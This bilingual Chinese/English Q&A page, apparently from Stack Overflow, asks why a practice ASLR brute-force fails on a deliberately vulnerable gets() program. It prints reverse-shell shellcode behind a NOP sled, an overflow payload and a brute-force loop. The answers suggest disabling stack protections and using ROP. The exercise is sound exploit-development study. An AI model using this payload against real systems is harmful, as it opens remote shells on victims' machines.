ASLR 暴力破解
我一直在尝试在我的机器上暴力破解 ASLR 实现,以进行练习。首先,我确保 ASLR 已打开。
cat /proc/sys/kernel/randomize_va_space
1
我正在使用的机器是:-
bt ~ # uname -a
Linux bt 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686 pentium3 i386 GNU/Linux
我的程序很简单,如下。
bt ~ # cat t.c
#include<stdio.h>
int main(int argc, char **argv) {
char buffer[50];
gets(buffer);
return 0;
}
为了利用这一点,我创建了一个环境变量,如下所示。正如您所看到的,它有一个非常巨大的 nop sled,其中包含反向 shell 的利用代码。
export EGG=`perl -e 'print "\x90"x64000 . "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xac\x10\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"'`
我使用以下 C 程序找出环境变量的地址:
int main(int argc, char **argv) {
printf("%p\n", getenv(argv[1]));
return 0;
}
我得到的地址为 0xbfefadfd。
我发现溢出返回地址需要 76 字节的内容 + 4 字节的返回地址。因此,为了进行暴力破解,我这样做: -
$ echo `perl -e 'print "A"x76 . "\xfd\xad\xef\xbf"'` > file
$ while true; do ./t < file; done
正如预期的那样,我得到了分段错误日志,但是,即使在运行程序大约 30 分钟后,我也没有得到反向 shell。我在这里做错了什么吗?
I have been trying to bruteforce the ASLR implementation on my machine, for practice. First, I make sure that ASLR is turned on.
cat /proc/sys/kernel/randomize_va_space
1
The machine I am using is :-
bt ~ # uname -a
Linux bt 2.6.20-BT-PwnSauce-NOSMP #3 Sat Feb 24 15:52:59 GMT 2007 i686 pentium3 i386 GNU/Linux
My program is simple, as follows.
bt ~ # cat t.c
#include<stdio.h>
int main(int argc, char **argv) {
char buffer[50];
gets(buffer);
return 0;
}
In order to exploit this, I create an environment variable as follows. As you can see, it has a really huge nop sled with the exploit code for a reverse shell.
export EGG=`perl -e 'print "\x90"x64000 . "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xac\x10\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"'`
I find out the address of the environment variable using the following C program:
int main(int argc, char **argv) {
printf("%p\n", getenv(argv[1]));
return 0;
}
I get the address as 0xbfefadfd.
I figure out that overflowing the return address takes 76 bytes of something + 4 bytes of the return address. So, in order to bruteforce I do:-
$ echo `perl -e 'print "A"x76 . "\xfd\xad\xef\xbf"'` > file
$ while true; do ./t < file; done
As expected I get a log of segmentation faults, however, I do not get a reverse shell even after running the program for about 30 minutes. Something Im doing wrong here?
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(3)
您必须考虑一些事项。
1. 您的 shellcode 必须与您的架构相匹配。 (这很容易测试)。
2. 因为您将 shellcode 放在堆栈上,所以必须确保堆栈是可执行的。
实现此目的的一种方法是使用“-z execstack”标志编译到 gcc。
此外,可能还有其他方法可以增加您找到正确地址的机会。
There is a few things you must take into consideration.
1. Your shellcode must match your architecture. (this is easy to test).
2. Because you put your shellcode on the stack, you must make sure the stack is executable.
One way to achieve this is to compile with the "-z execstack" -flag to gcc.
Also, there might be other approaches which might increase your chances to hit the correct address.
堆栈可能是不可执行的。您可以使用
readelf进行检查。如果GNU_STACK部分未标记为可执行,则您的应用程序具有 NX 堆栈。顺便说一句,在这种情况下有一个更好的方法来击败 ASLR。
你可以做的是返回到 .text 部分,其地址未被 ASLR 更改。 pop-ret、pop-pop-ret 会将堆栈弹出,直到达到一些“可用”值。可用的东西是高度情境化的。通常,您会寻找输入字符串、环境变量等的指针。
此外,面向返回编程(ROP)是当今的流行词。一探究竟。
It could be that the stack is non executable. You could check with
readelf. If theGNU_STACKsection is not marked executable, your application has NX stack.By the way, there is a better approach to defeat ASLR in this case.
What you could do is returning to .text section whose address is unchanged by ASLR. pop-ret, pop-pop-ret would pop the stack out until you reach some "usable" values. What is usable is highly situational. Usually, you'll look for pointers to input strings, env vars, etc.
Also, Return Oriented Programming (ROP) is a buzz word nowadays. Check it out.
我不知道你在哪个平台上尝试这个,但是除了 ASLR 之外,你的 gcc 很可能默认也使用堆栈金丝雀/保护。要使用 -fno-stack-protector 禁用此编译。
I don't know which platform you are trying this on, but it's very likely that aside from ASLR your gcc default to using a stack canary/protection as well. To disable this compile with -fno-stack-protector.